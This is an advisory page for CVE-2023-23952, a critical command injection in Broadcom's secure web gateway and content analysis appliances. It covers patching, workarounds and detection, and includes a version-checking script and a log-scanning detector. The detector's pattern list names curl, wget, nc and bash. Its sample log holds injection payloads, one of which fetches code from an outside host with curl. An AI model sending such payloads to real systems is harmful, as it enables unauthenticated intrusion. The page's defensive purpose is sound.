CVE-2023-23952

9.8 CRITICAL

📋 TL;DR

This CVE describes a command injection vulnerability in Broadcom's Advanced Secure Gateway (ASG) and Content Analysis (CA) appliances. An attacker who can reach a vulnerable appliance can supply crafted input that the appliance passes to the underlying operating system as part of a command, executing arbitrary commands without authenticating first. Every organization running a version below the fixed releases is affected, including appliances in their default configuration.

💻 Affected Systems

Products:
  • Advanced Secure Gateway
  • Content Analysis
Versions: Prior to 7.3.13.1 for Advanced Secure Gateway, prior to 3.1.6.0 for Content Analysis
Operating Systems: Appliance OS
Default Config Vulnerable: ⚠️ Yes
Notes: Affects default configurations of these security appliances.

📦 What is this software?

Advanced Secure Gateway is Broadcom's (formerly Symantec / Blue Coat) secure web proxy appliance; Content Analysis is the companion appliance that scans proxied content for malware. Both sit inline in user web traffic, which is why a command injection on them is treated as a critical issue: a compromised appliance sees the traffic it was deployed to inspect.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing attackers to execute arbitrary commands with high privileges, potentially leading to data theft, lateral movement, or complete system takeover.

🟠

Likely Case

Remote code execution allowing attackers to gain shell access, install malware, or pivot to internal networks.

🟢

If Mitigated

Limited impact if network access to the appliance is restricted to trusted sources, since the injection still requires the attacker to reach the vulnerable input. There is no configuration setting on the appliance that removes the flaw; only the patch does.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Command injection vulnerabilities typically have low exploitation complexity when no valid credentials are required: the attacker only needs network reachability and a payload that survives whatever escaping the appliance applies.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.3.13.1 for Advanced Secure Gateway, 3.1.6.0 for Content Analysis

Vendor Advisory: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/22217

Restart Required: Yes

Instructions:

1. Download the appropriate patch from the Broadcom support portal.
2. Back up the current configuration.
3. Apply the patch following the vendor instructions.
4. Restart the appliance.
5. Verify that the running version is the fixed release (see How to Verify below).

🔧 Temporary Workarounds

Network Segmentation

Applies to: all affected versions

Restrict network access to the vulnerable appliances, on both the traffic and management paths, to trusted sources only.

Input Validation Rules

Applies to: all affected versions

If the appliance's policy layer lets you filter requests before they reach the affected component, reject requests whose user-controlled parameters contain shell metacharacters (;, |, &, $(, backticks, newlines). Treat this as a stopgap only: it does not remove the flaw and can be bypassed by encoded or obfuscated payloads.

🧯 If You Can't Patch

  • Isolate affected systems from the internet and restrict internal access to the hosts that genuinely need to reach them
  • Monitor requests to the appliance for shell metacharacters in parameters, and alert on shell or interpreter processes spawned by the appliance's service processes

🔍 How to Verify

Check if Vulnerable:

Check the running version via the web interface, or from the CLI with show version, and compare it against the fixed releases below.

Check Version:

show version

Verify Fix Applied:

Verify the version is 7.3.13.1 or higher for Advanced Secure Gateway, 3.1.6.0 or higher for Content Analysis. Compare the version component by component (7.3.13.1 is newer than 7.3.9.2 even though "9" sorts after "13" as text).
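The version comparison above is easy to get wrong when done by eye or with a string comparison, so here is an added Python example (not code from the page or from Broadcom) that parses show version output and decides whether an appliance is below the fixed release. The output lines it parses are constructed samples, and it assumes the CLI prints a dotted version number somewhere in its output; it follows the page's rule that anything below the fixed release is vulnerable.

```python
import re

# Minimum fixed releases from the Broadcom advisory for CVE-2023-23952.
FIXED_VERSIONS = {
    "Advanced Secure Gateway": (7, 3, 13, 1),
    "Content Analysis": (3, 1, 6, 0),
}

# First dotted version number (two to four components) in a block of text.
VERSION_RE = re.compile(r"(\d+(?:\.\d+){1,3})(?!\d)")


def parse_version(text):
    """Extract the first dotted version from CLI/web output as a 4-tuple of ints.

    Shorter versions are right-padded with zeros so 7.3.13 compares as 7.3.13.0.
    """
    match = VERSION_RE.search(text)
    if not match:
        raise ValueError("no version string found in output")
    parts = tuple(int(p) for p in match.group(1).split("."))
    return parts + (0,) * (4 - len(parts))


def is_vulnerable(product, version_output):
    """True when the parsed version is strictly below the fixed release."""
    fixed = FIXED_VERSIONS[product]
    return parse_version(version_output) < fixed


def check_all(appliances):
    """Evaluate a list of (name, product, show-version output) and return findings."""
    findings = []
    for name, product, output in appliances:
        running = parse_version(output)
        findings.append({
            "appliance": name,
            "product": product,
            "running": ".".join(map(str, running)),
            "fixed": ".".join(map(str, FIXED_VERSIONS[product])),
            "vulnerable": running < FIXED_VERSIONS[product],
        })
    return findings


# Constructed sample outputs; real show version output contains more fields.
SAMPLE_APPLIANCES = [
    ("asg-edge-1", "Advanced Secure Gateway", "Version: 7.3.12.2\nRelease id: 000000"),
    ("asg-edge-2", "Advanced Secure Gateway", "Version: 7.3.13.1\nRelease id: 000000"),
    ("ca-dc-1", "Content Analysis", "Content Analysis 3.1.5.3"),
]

if __name__ == "__main__":
    for finding in check_all(SAMPLE_APPLIANCES):
        state = "VULNERABLE" if finding["vulnerable"] else "patched"
        print(f"{finding['appliance']}: {finding['running']} (fixed {finding['fixed']}) -> {state}")
```

Feed it the captured output of show version from each appliance; the tuple comparison handles the 7.3.9 vs 7.3.13 case correctly, which a plain string sort does not.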

📡 Detection & Monitoring

Log Indicators:

  • Shell metacharacters (;, |, &&, $(, backticks) or encoded equivalents in request parameters sent to the appliance
  • Shell or interpreter processes spawned by the appliance's service processes
  • Command execution on the appliance with no preceding administrator login (the exploit is unauthenticated, so do not rely on authentication failures as the trigger)

Network Indicators:

  • Unexpected outbound connections from appliance
  • Command and control traffic patterns

SIEM Query:

source="asg_appliance" AND (process="/bin/sh" OR process="/bin/bash" OR uri_query="*%3B*" OR uri_query="*%24%28*" OR uri_query="*%7C*")

The field names above are placeholders: adjust source, process and uri_query to whatever your log pipeline names those fields. The appliances are not Windows systems, so matching on cmd.exe adds nothing.
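To make the "command injection patterns" indicator concrete, here is an added Python detector (not from the page, the vendor or any product) that scans request logs for injection-style parameter values. The log format, the /api/status endpoint and the sample lines are all constructed for the example; real appliance logs will need a different parsing regex, and the pattern list is a triage filter that will miss obfuscated payloads rather than proof of exploitation.

```python
import re
from urllib.parse import unquote_plus

# Shell constructs that rarely appear in legitimate parameter values but are
# the usual building blocks of an OS command injection payload.
INJECTION_PATTERNS = [
    re.compile(p) for p in (
        r"[;|&]\s*(?:id|whoami|uname|cat|wget|curl|nc|bash|sh|python|perl)\b",
        r"\$\([^)]*\)",   # $(...) command substitution
        r"`[^`]*`",       # backtick command substitution
        r"\|\|",          # OR chaining
        r"&&",            # AND chaining
        r"\n",            # injected newline terminating a command
    )
]

# Constructed log layout: timestamp, client IP, quoted request line, status.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})$'
)


def extract_params(target):
    """Return query-string values, URL-decoded twice to expose double encoding."""
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    values = []
    for pair in query.split("&"):
        value = pair.split("=", 1)[1] if "=" in pair else pair
        values.append(unquote_plus(unquote_plus(value)))
    return values


def suspicious_values(line):
    """Decoded parameter values in one log line that match an injection pattern."""
    match = LOG_RE.match(line)
    if not match:
        return []
    return [
        value
        for value in extract_params(match.group("target"))
        if any(p.search(value) for p in INJECTION_PATTERNS)
    ]


def scan(lines):
    """Return (client, decoded suspicious values) for every line that trips a pattern."""
    hits = []
    for line in lines:
        values = suspicious_values(line)
        if values:
            hits.append((LOG_RE.match(line).group("src"), values))
    return hits


# Constructed sample log; the hypothetical /api/status endpoint takes a host parameter.
SAMPLE_LOG = """\
2024-01-05T10:00:01Z 10.0.0.5 "GET /api/status?host=10.0.0.9 HTTP/1.1" 200
2024-01-05T10:00:07Z 198.51.100.7 "GET /api/status?host=10.0.0.9%3Bid HTTP/1.1" 200
2024-01-05T10:00:09Z 198.51.100.7 "POST /api/status?host=%24%28whoami%29 HTTP/1.1" 500
2024-01-05T10:00:12Z 10.0.0.6 "GET /api/status?host=a%26%26curl+http%3A%2F%2F203.0.113.4%2Fx HTTP/1.1" 200
"""

if __name__ == "__main__":
    for client, values in scan(SAMPLE_LOG.splitlines()):
        print(f"{client}: {values}")
```

Run it over an exported log; the decode-twice step matters because a payload encoded once by the attacker and once more by a proxy in front of the appliance will otherwise look like harmless text. Pair a hit with the network indicators above (an outbound connection from the appliance to the host named in the payload, for instance) before treating it as a confirmed compromise.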
